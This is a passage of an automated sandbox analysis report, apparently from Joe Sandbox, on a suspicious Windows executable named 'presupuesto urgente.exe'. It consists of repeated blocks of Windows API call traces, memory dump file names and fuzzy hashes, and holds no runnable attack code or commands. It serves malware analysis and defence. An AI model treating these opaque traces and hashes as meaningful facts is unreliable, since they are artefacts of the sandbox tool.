                                                                                                                                                      • SetFilePointer.KERNELBASE(0014F4B2,00000000,00000000,00414ED0,00004000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000), ref: 00403404
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FilePointer$CountTick
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1092082344-0
                                                                                                                                                      • Opcode ID: 63f894617870b8b9b6b4d0f35ad55c68ae2789ba15d09fbc75adc17a06edb544
                                                                                                                                                      • Instruction ID: 8a5bf560653b24f1bd3cd60389d49066fb51751ebaffca469d7b7cf87711dc5f
                                                                                                                                                      • Opcode Fuzzy Hash: 63f894617870b8b9b6b4d0f35ad55c68ae2789ba15d09fbc75adc17a06edb544
                                                                                                                                                      • Instruction Fuzzy Hash: 10316C72610211DBD711DF29EEC49A63BA9F78439A714823FE900B62E0CBB95D058B9D
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057
                                                                                                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                                                                        • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                                                                                                                        • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 334405425-0
                                                                                                                                                      • Opcode ID: 44d570d4ef42a6af9798bac81a48d6e43403590213f26621d83d999ce1ed40c7
                                                                                                                                                      • Instruction ID: efb744b1bbbaa1f1e58e2693dd3ff93cd36a27706c6aad24c330354b17a2434d
                                                                                                                                                      • Opcode Fuzzy Hash: 44d570d4ef42a6af9798bac81a48d6e43403590213f26621d83d999ce1ed40c7
                                                                                                                                                      • Instruction Fuzzy Hash: 6F21C531900218EBCF20AFA5CE4CA9E7A70AF04354F60413BF610B61E1DBBD4991DA6E
                                                                                                                                                      APIs
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00401BE1
                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Global$AllocFree
                                                                                                                                                      • String ID: Call
                                                                                                                                                      • API String ID: 3394109436-1824292864
                                                                                                                                                      • Opcode ID: 6a27723cd33979d5ccceb52c727bba02617a76204f9552189d3104983f6bb1b5
                                                                                                                                                      • Instruction ID: 81df35259a3df780e2a5f09322996839f14f5544e2eb4a40810e3e9637107665
                                                                                                                                                      • Opcode Fuzzy Hash: 6a27723cd33979d5ccceb52c727bba02617a76204f9552189d3104983f6bb1b5
                                                                                                                                                      • Instruction Fuzzy Hash: 06218E72A40140DFDB20EB949E8495E77B9AF44314B25413BFA02F72D1DB789851CB9D
                                                                                                                                                      APIs
                                                                                                                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                                                                                                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp,00000000,00000011,00000002), ref: 00402551
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Enum$CloseValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 397863658-0
                                                                                                                                                      • Opcode ID: 297b237e24fbbf63aa7ca08728d7b3950c3333922afcc1c5b6d3d1192ed08725
                                                                                                                                                      • Instruction ID: 4fa2f3c06f6248971957712acf2942ced6ba336c37b2851dfbda8b2cd28c17b0
                                                                                                                                                      • Opcode Fuzzy Hash: 297b237e24fbbf63aa7ca08728d7b3950c3333922afcc1c5b6d3d1192ed08725
                                                                                                                                                      • Instruction Fuzzy Hash: 6D017171904104EFE7159FA5DE89ABFB6B8EF44348F10403EF105A62D0DAB84E459B69
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualAllocEx.KERNELBASE(00000000), ref: 1000295B
                                                                                                                                                      • GetLastError.KERNEL32 ref: 10002A62
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8114030407.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8113998987.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8114063244.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8114087670.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocErrorLastVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 497505419-0
                                                                                                                                                      • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                                                                                                      • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                                                                                                                      • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                                                                                                      • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 004031DF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                      • Opcode ID: af526002166308cc95fa76d49654f36d838bd7a13899b6376ccfe278c881acad
                                                                                                                                                      • Instruction ID: 4c6ae7a0626839fce45d877b24888c0af913333af22313e68c4d1644c71cb298
                                                                                                                                                      • Opcode Fuzzy Hash: af526002166308cc95fa76d49654f36d838bd7a13899b6376ccfe278c881acad
                                                                                                                                                      • Instruction Fuzzy Hash: 3B319C3020021AFFDB109F95ED84ADB3F68EB04359B1085BEF904E6190D778CE509BA9
                                                                                                                                                      APIs
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp,00000000,00000011,00000002), ref: 00402551
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseQueryValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3356406503-0
                                                                                                                                                      • Opcode ID: a3b88ef37a04c447d509aafcd647c8bb55f7a85eb83bcf9e8b78a58130226466
                                                                                                                                                      • Instruction ID: 2d27e3624369fee7c217219a4e344138e42523264533ea489648bddc6477d6d2
                                                                                                                                                      • Opcode Fuzzy Hash: a3b88ef37a04c447d509aafcd647c8bb55f7a85eb83bcf9e8b78a58130226466
                                                                                                                                                      • Instruction Fuzzy Hash: 53119171900209EBEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D7B84A45DB5A
                                                                                                                                                      APIs
                                                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                      • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                                                                      • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                                                                                      • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                                                                      • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                                                                                      APIs
                                                                                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseDeleteValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2831762973-0
                                                                                                                                                      • Opcode ID: 3500e27f67e3657d3f13e648c5a4e4955d4a6b8459d35a1d73aadda57e6becb1
                                                                                                                                                      • Instruction ID: eeebe11236d86b478005370e27fb04b66889edd8f93d7ff1d49de92df4b57ee5
                                                                                                                                                      • Opcode Fuzzy Hash: 3500e27f67e3657d3f13e648c5a4e4955d4a6b8459d35a1d73aadda57e6becb1
                                                                                                                                                      • Instruction Fuzzy Hash: 58F09632A04114DBE711BBA49B4EABEB2A59B44354F16053FFA02F71C1DEFC4D41866D
                                                                                                                                                      APIs
                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$EnableShow
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1136574915-0
                                                                                                                                                      • Opcode ID: 611feb8e2eb8574bcf65ce6e82aff3c902186df27cfe016bcc5f4eefe149f0e3
                                                                                                                                                      • Instruction ID: 353457a250eeab47012712e359045a90ae935b3a48e85cb5936bf3a8ff6902a1
                                                                                                                                                      • Opcode Fuzzy Hash: 611feb8e2eb8574bcf65ce6e82aff3c902186df27cfe016bcc5f4eefe149f0e3
                                                                                                                                                      • Instruction Fuzzy Hash: 40E09232E08200CFD724DBA5AA4946D77B0EB84354720407FE112F11D1DA784881CF6D
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                                                                                                                        • Part of subcall function 0040671A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
                                                                                                                                                        • Part of subcall function 0040671A: wsprintfW.USER32 ref: 0040676C
                                                                                                                                                        • Part of subcall function 0040671A: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406780
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2547128583-0
                                                                                                                                                      • Opcode ID: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
                                                                                                                                                      • Instruction ID: 6fedc38abd16d04710e8a636fd16f84820eabe090bba127bd882252d3fb3e83b
                                                                                                                                                      • Opcode Fuzzy Hash: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
                                                                                                                                                      • Instruction Fuzzy Hash: 21E0863250421156D21096745E4893772AC9AC4718307843EF956F3041DB389C35A76D
                                                                                                                                                      APIs
                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\presupuesto urgente.exe,80000000,00000003), ref: 00405EA6
                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 415043291-0
                                                                                                                                                      • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                                                      • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                                                                      • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                                                      • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                                                                      APIs
                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76893420,004036D5,?,00000006,00000008,0000000A), ref: 00405966
                                                                                                                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405974
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
